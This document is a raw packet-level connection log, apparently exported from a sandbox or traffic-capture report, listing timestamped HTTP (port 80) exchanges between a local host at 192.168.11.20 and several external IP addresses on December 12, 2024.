                                                                                        Dec 12, 2024 21:54:35.225780010 CET4972180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.242455006 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.356415033 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.356578112 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.363010883 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.363084078 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.476893902 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.476969004 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.476998091 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477394104 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477435112 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477462053 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.477489948 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494647026 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494718075 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.494751930 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.495194912 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:36.499610901 CET8049722199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:36.499948978 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:37.865216017 CET4972280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.882533073 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.996381998 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:38.996668100 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:38.999013901 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.112667084 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130281925 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130295038 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130302906 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.130650043 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.131963968 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.135644913 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:39.135904074 CET4972380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:54:39.245718002 CET8049723199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.297552109 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.411784887 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.411957026 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.415591955 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.529457092 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703825951 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703843117 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.703854084 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.704654932 CET8049724172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:44.704864025 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:44.705254078 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:45.925991058 CET4972480192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:46.942150116 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.056186914 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.056376934 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.060172081 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.174042940 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372967005 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372980118 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.372992039 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.373158932 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:47.373963118 CET8049725172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:47.374098063 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:48.566531897 CET4972580192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.582984924 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.697102070 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.697263956 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.703917980 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.704006910 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:49.818101883 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818141937 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818418980 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:49.818460941 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001415014 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001422882 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001427889 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.001619101 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:50.002629995 CET8049726172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:50.002789021 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:51.206720114 CET4972680192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.223444939 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.337891102 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.338110924 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.340471029 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.454410076 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635255098 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635380983 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635396004 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635617018 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:52.635648012 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.635792017 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.636897087 CET4972780192.168.11.20172.67.131.144
                                                                                        Dec 12, 2024 21:54:52.750821114 CET8049727172.67.131.144192.168.11.20
                                                                                        Dec 12, 2024 21:54:57.855012894 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.015391111 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.015573978 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.019175053 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:58.179395914 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180129051 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180139065 CET8049728103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:54:58.180356979 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:54:59.532800913 CET4972880192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.549632072 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.708262920 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.708487034 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.712104082 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:00.870713949 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871450901 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871572971 CET8049729103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:00.871706963 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:02.219487906 CET4972980192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.235625982 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.395343065 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.395565987 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.399182081 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.399267912 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:03.559007883 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559618950 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559663057 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559695005 CET8049730103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:03.559839010 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:04.906615019 CET4973080192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:05.922502041 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.082986116 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.083199024 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.087656975 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.247978926 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.248677969 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.248703957 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:06.249039888 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.250485897 CET4973180192.168.11.20103.106.67.112
                                                                                        Dec 12, 2024 21:55:06.410865068 CET8049731103.106.67.112192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.411772966 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.543206930 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.543448925 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.547008991 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.677968979 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.677985907 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.678143024 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:11.678212881 CET8049732199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:11.678404093 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:13.060904026 CET4973280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.078252077 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.191973925 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.192174911 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.195770979 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.309632063 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327230930 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327280045 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327332020 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.327462912 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:14.334944963 CET8049733199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:14.335093021 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:15.700908899 CET4973380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.718278885 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.832043886 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.832237005 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.838540077 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.838594913 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.838669062 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.952311993 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952332973 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952613115 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952634096 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952860117 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952879906 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.952894926 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.969772100 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.969784021 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.969932079 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.969999075 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.970175982 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:16.974950075 CET8049734199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:16.975116968 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:18.341032982 CET4973480192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.358473063 CET4973580192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.489701033 CET8049735199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:19.489916086 CET4973580192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.492327929 CET4973580192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.623517990 CET8049735199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:19.623548985 CET8049735199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:19.623569012 CET8049735199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:19.623836040 CET4973580192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.625107050 CET4973580192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:19.755575895 CET8049735199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:24.803910971 CET4973680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:24.978914022 CET8049736209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:24.979125023 CET4973680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:24.982733965 CET4973680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:25.157565117 CET8049736209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:25.175986052 CET8049736209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:25.176014900 CET8049736209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:25.176388025 CET4973680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:26.495527029 CET4973680192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:27.511951923 CET4973780192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:27.687298059 CET8049737209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:27.687468052 CET4973780192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:27.691076994 CET4973780192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:27.866142035 CET8049737209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:27.871979952 CET8049737209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:27.872172117 CET8049737209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:27.872309923 CET4973780192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:29.198662043 CET4973780192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:30.214260101 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:30.389909029 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.390172958 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:30.394112110 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:30.394176006 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:30.569120884 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.569180012 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.569463968 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.569529057 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.577013969 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.577080965 CET8049738209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:30.577261925 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:31.900739908 CET4973880192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:32.918144941 CET4973980192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:33.081564903 CET8049739209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:33.081712008 CET4973980192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:33.086163044 CET4973980192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:33.249219894 CET8049739209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:33.256392002 CET8049739209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:33.256402969 CET8049739209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:33.256685972 CET4973980192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:33.258173943 CET4973980192.168.11.20209.74.79.40
                                                                                        Dec 12, 2024 21:55:33.421238899 CET8049739209.74.79.40192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.436260939 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:38.568031073 CET8049740199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.568181992 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:38.574903011 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:38.706279993 CET8049740199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.706302881 CET8049740199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.706515074 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:38.706562996 CET8049740199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:38.706847906 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:40.086390972 CET4974080192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:41.102582932 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:41.234111071 CET8049741199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:41.234278917 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:41.237845898 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:41.369225979 CET8049741199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:41.369245052 CET8049741199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:41.369355917 CET8049741199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:41.369450092 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:41.369663000 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:42.742990971 CET4974180192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.759516954 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.873431921 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.873594046 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.880404949 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.880458117 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.880502939 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:43.994196892 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994215965 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994448900 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994689941 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994698048 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994704008 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:43.994710922 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:44.012053013 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:44.012065887 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:44.012248993 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:44.012268066 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:44.012326956 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:44.015944958 CET8049742199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:44.016139984 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:45.382124901 CET4974280192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.398507118 CET4974380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.529779911 CET8049743199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:46.529980898 CET4974380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.532443047 CET4974380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.663615942 CET8049743199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:46.663629055 CET8049743199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:46.663636923 CET8049743199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:46.663949966 CET4974380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.664722919 CET4974380192.168.11.20199.59.243.227
                                                                                        Dec 12, 2024 21:55:46.795178890 CET8049743199.59.243.227192.168.11.20
                                                                                        Dec 12, 2024 21:55:51.828944921 CET4974480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:51.960827112 CET804974476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:51.961086035 CET4974480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:51.965357065 CET4974480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:52.096324921 CET804974476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:52.096333027 CET804974476.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:52.096470118 CET4974480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:53.474139929 CET4974480192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:54.490299940 CET4974580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:54.621812105 CET804974576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:54.622080088 CET4974580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:54.626027107 CET4974580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:54.756758928 CET804974576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:54.756767035 CET804974576.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:55:54.756907940 CET4974580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:56.129833937 CET4974580192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:57.145972967 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:55:58.144448996 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:00.159621000 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:04.174371958 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.188286066 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.319904089 CET804974676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:12.320048094 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.326941013 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.458286047 CET804974676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:12.458523035 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.458574057 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.589806080 CET804974676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:12.590008020 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.590059042 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:12.721719980 CET804974676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:12.721729040 CET804974676.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:12.722018957 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:13.829639912 CET4974680192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:14.845276117 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:14.977035046 CET804974776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:14.977190018 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:14.982254982 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:15.116914034 CET804974776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:15.116921902 CET804974776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:15.117217064 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:15.117852926 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:15.453167915 CET4974780192.168.11.2076.223.54.146
                                                                                        Dec 12, 2024 21:56:15.584005117 CET804974776.223.54.146192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.352520943 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:20.466131926 CET804974852.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.466377974 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:20.474040985 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:20.587740898 CET804974852.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.604863882 CET804974852.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.604875088 CET804974852.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.605043888 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:20.609833002 CET804974852.223.13.41192.168.11.20
                                                                                        Dec 12, 2024 21:56:20.610018969 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:21.984183073 CET4974880192.168.11.2052.223.13.41
                                                                                        Dec 12, 2024 21:56:22.999825954 CET4974980192.168.11.2052.223.13.41
